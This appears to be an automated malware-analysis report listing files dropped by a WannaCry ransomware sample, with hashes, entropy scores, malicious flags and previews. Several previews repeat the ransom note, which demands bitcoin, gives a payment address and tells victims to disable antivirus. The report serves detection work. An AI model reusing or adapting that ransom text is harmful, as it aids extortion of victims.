                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20760
                                Entropy (8bit):7.99135687516381
                                Encrypted:true
                                SSDEEP:384:xflSm2wno8JkzRbdH2BxrWKUl+o9sBitsncs5BcckqOF6buYG5l8L/GsDZiGIH2:xNokkzRbdYxrWKUMo9ltsd3DrObYG5pE
                                MD5:5F4298C3D49D4C887DE63384A219D65A
                                SHA1:4047029C1715A4F0224EAED31D15256DA884AE9C
                                SHA-256:2C911EF63C29CE755CF0586FB844A215D9A4F31EEAA6812BF35716AE7A406226
                                SHA-512:CF7AFC868EB2BD9492A073CC309F120EECD2C816B047EFD60C892B272216152B62B140E967548F8CDEA6C58D65A385F48EBB5274E17378A5D3DEC8366709A35D
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1368
                                Entropy (8bit):7.833229274628152
                                Encrypted:false
                                SSDEEP:24:bkoZAE890LBPHIxKSJhwIKtaJwH5t1wbbZDsFSwrfIr44K+P8/HhIDIp:bkvExLmKGh88Y5fwdWSw8Zpk5IDIp
                                MD5:3A8BA42E6CB4A554D2611C4243655D89
                                SHA1:1AFC3B8998B761F3247FEED62F5BF3288D7364CC
                                SHA-256:6904FA25E0D3F5DC7513443D3EC74FEC62EE2DD2FFC972BF5EF818EB496373A0
                                SHA-512:23D67888B2D87D964E324C1069C768D2F58333ADA53019F4A5BA01E4B31CF62B297B51BE81C6105350B60F51FB10B44004B924E5F7CA1D8F5D6504A7F617B6E4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9658633222462845
                                Encrypted:false
                                SSDEEP:96:ocJ9zbhdetqPaq52m0TjlX+rgDvMSeQV3s82l08EwxUNZo1RRcquaxFj:vzbbe0Pj5OlM6jVs8gpGN2z39xFj
                                MD5:DD35115478B5F07C899D5BDCC061DEE2
                                SHA1:1F6A498AC08D48A83C81C486A775124C5E6946BC
                                SHA-256:5E4AD93033D1230E8AF3553698B1FF5EC7039FEBCC3EA3C03329830F69DD4BA2
                                SHA-512:63962F1E6F8891E2D62014B0030912C959E583F3CD73C8CFFC3B80FDBECF6A9BD2D0F2A7AAD03555DE109C0635E11384EBB813F320080C44A8A2430E04485E55
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9613632611220035
                                Encrypted:false
                                SSDEEP:96:oWRRQwg3dcEYBjywvWe7CgwEgm5WHUiHPulY3tk5+jY/Wr4R6EogmQkx4F6V:7/QhCFv9wDq/iHMYaYE/Y4AFQM4wV
                                MD5:A17FDAE00CEDDB34B552197373C79E7D
                                SHA1:446256E6449BE353B14ED9DFE3EF34E5F81E2304
                                SHA-256:F24BF1784673FDC7DACFFB1810C833A591864F039EF4E9FF2199F4EE08F43416
                                SHA-512:7DB6CA58A85411D7BBC228E83023D135D76A79865A9ABA1CFE269D1A1B3CB2784AE52BA4D77ED56C665E5E5234A8D994406351D0C06CC2403B34C76C332C88C8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1032
                                Entropy (8bit):7.781047684038357
                                Encrypted:false
                                SSDEEP:24:bkKRSZxLLqBCmAkH1LRNdb6HfHvaekEvL8LM+Sw2i7XcQb1KB:bk4SZxDmAQLRNdQfHv5v3w2iwAEB
                                MD5:2BBEB274026F80662642FE8700F428BE
                                SHA1:B5F9B2E44C85B574407E2516F414440193F82480
                                SHA-256:783D437AC0AD6993553AA0441C22900B2C2CCE71EFACAC6EAD0E2E2192E59A04
                                SHA-512:C731A101CFADBC0E496BBF720BD0331AEF47E1BAFB4371FE8939E53F2AE2C59F2D397F19B8AC18B89845DB6D6B8304AE8FDD11D5B3EFD410132178061916B38F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1112
                                Entropy (8bit):7.813633193202283
                                Encrypted:false
                                SSDEEP:24:bk1IHNK8c7MVBvfBi/HneYQRDXrA01N0lqp9QkZxiVKTe:bk1Nt01o/bgDXrtylM9Q2xiMa
                                MD5:89D17B244D1C49CAFD0318A51051D603
                                SHA1:EB971DE6298029ABE7C72D8FF63E440D3DE15B0B
                                SHA-256:92F884B4859DA809A254573E48C7F30544F5EABF01891395F58149BA147A9A78
                                SHA-512:7367B409CB715BCD2D2319EE1F728C116A867C2130427212537F840511AD235F7004233BD3205ECACEFED5B35DDE7D739140537AD1D57E76B0DB7E89BE2B39DB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1768
                                Entropy (8bit):7.899991746181669
                                Encrypted:false
                                SSDEEP:48:bk6MF//6aNjgWzIHwfGTuqbFiGriJGrgPSSK:o6MxhNUHYqpjiY/Z
                                MD5:28EF705A7680E734E0CF6ABB3C3ACB1F
                                SHA1:12EE1C6322735387FCEE27F1447E74BCA851224B
                                SHA-256:5A303191ACB615E631BE3D99078DEC936ED6B6B6FC19B8DAF54AB6BEEB27DA36
                                SHA-512:DAC79AC9C646225987F6356871E955C7B21D4E99295488AB566CB5D65F13813DEB61DE4D31569169FB691FD29F0754AEF09DC0498424756E1118265E850EAAFA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1032
                                Entropy (8bit):7.795895638319137
                                Encrypted:false
                                SSDEEP:24:bkstgTVGQ1/7bHzOQmZ3erGb4z3CmIUsCcvPokyG17NG+WX:bkKmG+/vz5uAztunoGxY5
                                MD5:A25B81A58FB62AAE32BE3F8F6249873F
                                SHA1:50E3B4D872499B8F3CCBF1181EDFEA6479A94308
                                SHA-256:0513DDDAC481C043C8D86596ED7260F7F4A0F0EA07EFA20616C0D117601D7E08
                                SHA-512:08EB319074CF96CCC45E82F7E648C51ED01BCF784A427AB0A631D6D19A0317A80DA455C1F0C5016295420D4BFE103857D93CE8A8F3AB380548D43D6921B41175
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5256
                                Entropy (8bit):7.962480048813014
                                Encrypted:false
                                SSDEEP:96:oK0M4EJ2fQp5CgXPtcMey1r1Vb3w8Exj/YhwkINjAu+/YaR4Z/Ba3fZ8RviOPlO:AwJ2fQpVefK1VTjeUQMYmuBZdlO
                                MD5:F54B26E7593691E1CAFCE8E100BE0BA1
                                SHA1:491B8A1A890860F917388127207F18D6F0505077
                                SHA-256:13D06D50A131A3FE0819554D88F9CFE72414C62DE018944F7D0EEB221884D401
                                SHA-512:9373B6159F9B78B2F510D7323C242CF4491555B8F9D72013D29873841DEDFFFFA2B830970CD4495696A7B0ABD82CF570DB7143DF0C4B4FB213AA5E84EFB53980
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):548472
                                Entropy (8bit):7.999696144120696
                                Encrypted:true
                                SSDEEP:12288:wpBJJhXkMAH/5C49/sbbENpxk4rA+iMrwze8H/8E:IJrUMA8bEPC4Zive8f8E
                                MD5:E5F1FEB1F16CF8D1492B9AC4D63A7D2D
                                SHA1:345941C449DDF3683870D9FA23C8648B5A4ADCF3
                                SHA-256:CEB55A2F6841585612B0B27D67E931FF512AF5164E75F3F9144948819F05BEF1
                                SHA-512:C99C7E43D2D9AF24CD30F5E84F4A324B26C6A5F9C4A3D4DEA7222ED4028E7F3D83C0A3E30AC13998DA70B0C17A3F6BAD1D432863F3F539A199F74891897FA783
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2972600
                                Entropy (8bit):7.999939498778598
                                Encrypted:true
                                SSDEEP:49152:cm4ePQ5QKdH7QYSUURSpp7bGKQnr/AcYsMrBQSJiXyCTu8EL+MRscTLt:cIQxVjUIp7bPA/nY3dJjMks+Lt
                                MD5:AB67F3514364D0EE4F586DF1382C17A5
                                SHA1:1A53793D146FCB7BF9B1BA27123C2024F77F3D84
                                SHA-256:6023143E65F54F39B2A1E76BB511A75F40E73D80D0DBB7891B51FC830D238292
                                SHA-512:F4EA53870F1BD3504CEEC03E548BDA8902B24282F7436A90138E9BFB42B80A0833F884D12161E9A00458A81500ED57A97C9FB9ABBA5A454DFB6A797AFEDE8863
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):130040
                                Entropy (8bit):7.998646644689255
                                Encrypted:true
                                SSDEEP:3072:DgYx3Q0Sapu3016Gd1V0xCUCykJNtewXt15jZPetE2I:DD3ii6K1Vn0+tnl85I
                                MD5:265367F96240E1B083E332B2D221864A
                                SHA1:3634670A86FD99B0B27B2DB0D548F8469604153E
                                SHA-256:BD6DBB44E81F502BF7F68CCC835DF66CF69A3869F3338BD3D00AC13C0D04DA57
                                SHA-512:D439EA321F7BBB55494DC066D7153FECC9D62E8D9DA40B738FA0576A5F4D2CEE5C988C150798E3E4842AE7C0822EDA88871C29886217CCA752553DD99C261FFA
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44776
                                Entropy (8bit):7.995869848132826
                                Encrypted:true
                                SSDEEP:768:sS47au+7FMM0Dsdy9EiWJRG+Hb12MDior975OUtIWnrHd:sS47au2yQQ9ENJsFM+oBlOUFnrHd
                                MD5:FB1A86132A5642F7A1E5C1BB4A8CF6F3
                                SHA1:F7F168C34A57BC0DCF1C2BD133A3AA813A66BD4A
                                SHA-256:F736E17854745CC81BA3DB1D794D3B5691CF12585F19DB9E71F0D1D230E047C6
                                SHA-512:733C68825A1CDCF400ADF4EB5F64E80CA11F1E55242BFC2C504A9F5CE924E405D46F5094B4C33F511CED0F8F90D8321E89593D8E800EFC1320B3BF0F0754B1A6
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29160
                                Entropy (8bit):7.994211201577926
                                Encrypted:true
                                SSDEEP:768:kOt/8oGMb6ACTrJZy5MjQoOOwDS6dwQm18/lef:nGEYZZyGjeKJdAef
                                MD5:0F271D24D1273AF854DB0366A8ADFB2D
                                SHA1:DC6A12708EA9EEC24FCCBB6E490B4947F7870C8A
                                SHA-256:D73DF23ECACF7F24752414A13C297819A558F947B71705BA1FAFF1BBD026CCD5
                                SHA-512:5F6C309915C6426AE03DC159C83DEBAD5973BD58075DEE1F1A93AA1338C103A9DF3E1112819B425C72CAED500F98FFCAD5D42C6C2894100DCADAC86A5D4BC2DA
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):39672
                                Entropy (8bit):7.995996326109371
                                Encrypted:true
                                SSDEEP:768:eLDEl0FLrRrcLRWLL/ECf3/Q5lCvzlXxWOx4VBinpkWQln:eLDElyrRILRWPRfPQbCv+O1p3Qln
                                MD5:D8D89BCF07D7A08C49868F16702E22F9
                                SHA1:E712452F90B2510CCC3ED01E498E57CD8CD86243
                                SHA-256:FBC09743DC17EEF2C995424E8DF2F318F57B08440F7952E5286BF4305413EAB2
                                SHA-512:13CC1D315B634CCDEAE6EB47F04C2EC8947323C4A59A9155545531AACE624A0A129E2626FA6F2BBE2073B3156E133976C812A31F2E355614B39962BE5A284B63
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):130040
                                Entropy (8bit):7.99848498698783
                                Encrypted:true
                                SSDEEP:3072:x9/8h/IPnT43FLk0suNK2Pbfj15+qxcNoqZ1:x4/8TMPpFjPXcNZ
                                MD5:7DB85EFBDAE418F5BD9D2F31B8C5B978
                                SHA1:DC5D420E72EA845F112372ED198D41453C505999
                                SHA-256:87F38C6BF0F758B7BB1679BF298876E440A1E362110945E5EB6D0CEC9623054D
                                SHA-512:1E7930CA17B3CF8280FDB3D501A18F93585077B69998DF97EC887CD80D614A78C180D0FE974C086DCC280616A93E47DA21D536264233A86591949369037CD8BD
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29160
                                Entropy (8bit):7.9931204101305715
                                Encrypted:true
                                SSDEEP:768:5+jDsbJu/B1z4xGn7HfkiyeB8TAJR6rZeoL+:Vu/rcMnbyeiAD6rt+
                                MD5:C9728F394D26644958614D1AAB935630
                                SHA1:1BD2DB4EC4CE9493AA65C95CBAA7C08C16FCA978
                                SHA-256:49BCC2379A2E2307A271AB077A724D216E9E8204A6BDA27E09A8C47C6773D99E
                                SHA-512:D11252BAC2267E8B66B8F5C31DDE75CAC3DDC4CAD91029E5EB7BBDD85CBB384E726B4F9F14A7A0D8986234AFFB8B8597C54AEC8A195E43E6241084B51C865A9F
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):98584
                                Entropy (8bit):7.9980147883959445
                                Encrypted:true
                                SSDEEP:3072:SnXrLHcc2rDQgT8egmbaxI6XGnP8aL+ykHf/4:MHR2PLoNm2+fLEHf/4
                                MD5:2E1731A01DB5EA215463DA5A12C02F28
                                SHA1:846C1DEB7171C6998C44F2156DE8E0442CF88781
                                SHA-256:46A2D2F914980754B6ACBA6C5DF32B462E1B24AD1AFF461198F8E0069B896CCA
                                SHA-512:72ECBD239678745A796BF45DA956E7AB09CDA776138A5F108644DDA89DC40FAB07C9229F18434F03FCA5DA4ECA48C808ABD8C6C98C6824686E1776C52E4B25F1
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33048
                                Entropy (8bit):7.994733214312098
                                Encrypted:true
                                SSDEEP:768:ZxnZOCeDPAqdm41zfnAoAgUHUzJErTrloF/lDEJ+XJh6e:PQfDAF41z/ApgUyJErlGtEJWhF
                                MD5:5BFD7E020F0F0C275D100EBBCF19C37B
                                SHA1:502A5818AA3C36D1D8CB602990BECB3F27760DDF
                                SHA-256:C32DB725ABCF83AF19B2EE8FD166506760696675EB7ABBA5BF398E8711054073
                                SHA-512:EC15DEED1BB393F1D7FE42F293CE08F814662A73960A5CF1445BBB5A7895743F88CD351F85D471D8B8D356295DF8CFAC346F31CC27D51DAC6DD2E0D40B07FC47
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.993330742117823
                                Encrypted:true
                                SSDEEP:384:Mx6PQqMYis3eOloBbuwJe1xk27myHHrv7fBvczJmAS7Sn4x+5yfgC:1PubC/z6eXk26OLhpL7vfb
                                MD5:A77CC6D0E0F078E11E4F7CDCF884E345
                                SHA1:4D012AE1BAFF9699721888C793981A18D818F766
                                SHA-256:7ACC678F68C38A8D216773CC21EF0792840F0864130E8CACBD3E8769A6B701BC
                                SHA-512:DBB5B0E95D6277412FD3FADDC878BB2DFFDE0B2D890A179560A3FA70BF7D5F86553C7CDB7FB2C240D08BB2EF59DD07CE99B8DDD3650863E223E4CE194E588D16
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.18786193011106
                                Encrypted:false
                                SSDEEP:6:bkEKDmE9AvXqQ7s1wZUv+Ty8CJW9+hcBYONBSKU27W3dv3:bkEKDbiPqcbZUvwy8CI9+ar73D8dv3
                                MD5:B71CCEE6741DF21A33BD3875B1FEA990
                                SHA1:831DB70C27B39919D88599203D769E97A522BB70
                                SHA-256:6D10320FE47C39906FA90EF3A49C9AF56FB70E88EC05EBFC828EB74908B22CC5
                                SHA-512:9C85AFDF6A31AF4A24A15E6AC56DBE644D1A3EE35911CA41FC4F68B7B64D5092EF986E29ECDC47C0BCE07C5A5F9691E82AE6D5582A96706A72266B4D6D312DD0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
